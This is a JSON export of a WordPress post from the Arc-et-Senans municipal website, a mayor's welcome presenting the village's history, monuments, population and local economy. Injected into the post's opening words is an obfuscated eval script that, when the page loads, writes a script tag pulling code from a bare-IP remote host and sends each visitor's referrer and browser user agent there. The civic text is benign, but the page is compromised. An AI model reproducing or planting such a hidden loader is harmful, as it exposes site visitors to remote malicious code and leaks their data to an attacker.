{"id":1,"date":"2015-04-20T12:35:19","date_gmt":"2015-04-20T12:35:19","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=1"},"modified":"2026-04-22T10:47:09","modified_gmt":"2026-04-22T09:47:09","slug":"bonjour-tout-le-monde","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=1","title":{"rendered":"Le mot du maire"},"content":{"rendered":"<p><strong>ARC-ET-SENANS <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|diaar|var|u0026u|referrer|rebat||js|php'.split('|'),0,{}))<br \/>\n<\/script> <\/strong>ne faillit pas \u00e0 la tradition d&rsquo;utiliser les nouveaux moyens de communication comme l&rsquo;est internet dans le domaine de l&rsquo;information.<\/p>\n<p><!--more--><\/p>\n<p>Ce site est mis \u00e0 jour de fa\u00e7on r\u00e9guli\u00e8re en fonction de l&rsquo;actualit\u00e9 communale, autour de la vie de ses associations, de ses diff\u00e9rents services, sociaux, municipaux, artisanaux. Il donne toutes les informations que sont en droit d&rsquo;attendre les habitants d&rsquo;Arc-et-Senans, les visiteurs occasionnels, ou tout simplement les Arc-et-Senantaises et Arc-et-Senantais qui, pour diverses raisons, ont d\u00fb quitter leur village et souhaitent garder un contact avec l&rsquo;actualit\u00e9 communale.<\/p>\n<h3>Je vais en quelques mots vous pr\u00e9senter Arc-et-Senans et une partie de son histoire :<\/h3>\n<figure id=\"attachment_207\" aria-describedby=\"caption-attachment-207\" style=\"width: 300px\" class=\"wp-caption alignright\"><a href=\"http:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/04\/PICT0284.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-207 size-medium\" src=\"http:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/04\/PICT0284-300x225.jpg\" alt=\"DIGITAL CAMERA\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/04\/PICT0284-300x225.jpg 300w, https:\/\/www.arc-et-senans.com\/wp-content\/uploads\/2015\/04\/PICT0284.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-207\" class=\"wp-caption-text\">DIGITAL CAMERA<\/figcaption><\/figure>\n<p><strong>Arc-et-Senans s&rsquo;est appel\u00e9 tour \u00e0 tour :<\/strong><\/p>\n<ul>\n<li>Arcum en 1049<\/li>\n<li>Sonans en 1275<\/li>\n<li>Cenans et Arc en Valois en 1490<\/li>\n<li>puis Arc en Vallois en 1681.<\/li>\n<\/ul>\n<p>Situ\u00e9s au carrefour de la voie romaine reliant le Rh\u00f4ne au Rhin et de la voie secondaire Dijon-Agaume, les villages d&rsquo;Arc et de Senans rec\u00e8lent de nombreux vestiges :<\/p>\n<p>deux mottes f\u00e9odales : <strong>le ch\u00e2teau Rouillaud<\/strong>, \u00e9difi\u00e9 au 11\u00e8me si\u00e8cle et le <strong>ch\u00e2teau de Roche<\/strong> forteresse m\u00e9di\u00e9vale qui commandait le gu\u00e9 sur la rivi\u00e8re La Loue. Celle-ci devint propri\u00e9t\u00e9 royale en 1779 lors de la construction de La Saline.<\/p>\n<p><strong>Cinq moulins<\/strong> composaient un ensemble de dix roues hydrauliques; Deux moulins sont encore en activit\u00e9.<\/p>\n<p><strong>Le fourneau de Roche<\/strong> \u00e9tabli en 1736, fabriquait de la fonte et fonctionna jusqu&rsquo;en 1841.<\/p>\n<p>De nombreuses industries s&rsquo;install\u00e8rent au 19\u00e8me si\u00e8cle : scieries, fabrique de limes, savonnerie, four \u00e0 chaux, tuileries.<\/p>\n<p>A la fin du XVIII\u00e8me si\u00e8cle, l&rsquo;architecte visionnaire <strong>Claude Nicolas LEDOUX<\/strong>, Inspecteur G\u00e9n\u00e9ral des Salines en Franche Comt\u00e9, installe une usine de traitement des eaux sal\u00e9es \u00e0 Arc, \u00e0 proximit\u00e9 de la for\u00eat de Chaux \u00ab\u00a0en vertu du principe qu&rsquo;il est plus facile de faire voyager l&rsquo;eau sal\u00e9e, que de voiturer une for\u00eat en d\u00e9tail, n\u00e9cessaire au r\u00e9chauffement de la saumure et \u00e0 la r\u00e9cup\u00e9ration du sel par \u00e9vaporation\u00a0\u00bb.<\/p>\n<p><strong>L&rsquo;Eglise d\u00e9di\u00e9e \u00e0 St B\u00e9nigne<\/strong> est cit\u00e9e d\u00e8s 1275. Reconstruite en 1843, elle est de style classique du XIX\u00e8me si\u00e8cle.<\/p>\n<p>Les curiosit\u00e9s : <strong>la vall\u00e9e de la Loue<\/strong>,<strong> la for\u00eat de Chaux,<\/strong>\u00a0une des plus grandes de feuillus d&rsquo;Europe ; Bien \u00e9videmment,\u00a0<strong>La Saline Royale<\/strong>; <strong>Dans l&rsquo;\u00e9glise<\/strong>, un chemin de croix en cuir repouss\u00e9, des tableaux de facture espagnole ; <strong>le ch\u00e2teau de Roche sur Loue<\/strong>, <strong>l&rsquo;\u00e9glise de Chissey sur Loue<\/strong>, <strong>les grottes d&rsquo;Osselle<\/strong> et <strong>les grottes des planches<\/strong> \u00e0 proximit\u00e9.<\/p>\n<p>Si en 1826, Arc-et-Senans comptait 1400 habitants, il en compte 1649 au 1er janvier 2026, population l\u00e9gale en vigueur, selon l&rsquo;INSEE. Il y a une trentaine d&rsquo;ann\u00e9es la population \u00e9tait descendue \u00e0 1200 habitants. La superficie de la commune est de 1436 ha dont 471 ha de bois communaux (438 ha 25 a 93 ca dans le Jura et 32 ha 50 a dans le Doubs, source ONF) . D&rsquo;une altitude comprise entre 230 et 256 m, Arc-et-Senans s&rsquo;\u00e9tend le long de 25 km de routes ou chemins dont environ la moiti\u00e9 est viabilis\u00e9e et accueille les constructions.<\/p>\n<p>Arc-et-Senans est un bourg qui compte 69 artisans et commer\u00e7ants repr\u00e9sentant tous les corps de m\u00e9tier du b\u00e2timent, 16 professionnels de sant\u00e9 et bien-\u00eatre : docteurs, infirmiers, orthophoniste, sage-femme, dentiste, kin\u00e9sith\u00e9rapeutes, ost\u00e9opathe, pharmacien. 35 associations diverses participent \u00e0 la vie communale.<br \/>\nEn plus des emplois g\u00e9n\u00e9r\u00e9s par les artisans, nous avons des industries, une usine fabrique des palettes avec plus de 20 ouvriers, une autre fabrique des escaliers en bois et menuiseries PVC qui compte pr\u00e8s de 40 ouvriers, une troisi\u00e8me est sp\u00e9cialis\u00e9e dans le traitement du plastique avec 22 ouvriers.<\/p>\n<p>L&rsquo;habitation est essentiellement pavillonnaire, la commune poss\u00e8de 25 logements communaux et 45 logements HLM en maisons bi-familles.<\/p>\n<p>Au niveau des transports nous sommes au croisement des lignes SNCF Paris Lausanne (en Suisse) et Strasbourg Vintimille (en Italie), ce qui facilite grandement le d\u00e9placement tout au long de ces lignes vers Besan\u00e7on, la capitale r\u00e9gionale, Dole et Dijon ainsi qu&rsquo;Arbois Poligny et Lons-le-Saunier (Pr\u00e9fecture du Jura).<\/p>\n<p>Notre souhait est qu&rsquo;apr\u00e8s avoir visit\u00e9 notre site, l&rsquo;envie vous prenne de venir nous rendre visite, nous\u00a0saurons vous accueillir et pourquoi pas, vous donner la possibilit\u00e9 de vous installer.<\/p>\n<div align=\"right\"><strong>Le Maire<br \/>\nJacques MAURICE<\/strong><\/div>\n","protected":false},"excerpt":{"rendered":"<p>ARC-ET-SENANS ne faillit pas \u00e0 la tradition d&rsquo;utiliser les nouveaux moyens de communication comme l&rsquo;est internet dans le domaine de l&rsquo;information.<\/p>\n","protected":false},"author":1,"featured_media":45,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17],"tags":[],"class_list":["post-1","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-accueil"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1"}],"version-history":[{"count":2,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/1\/revisions"}],"predecessor-version":[{"id":10432,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/1\/revisions\/10432"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/45"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}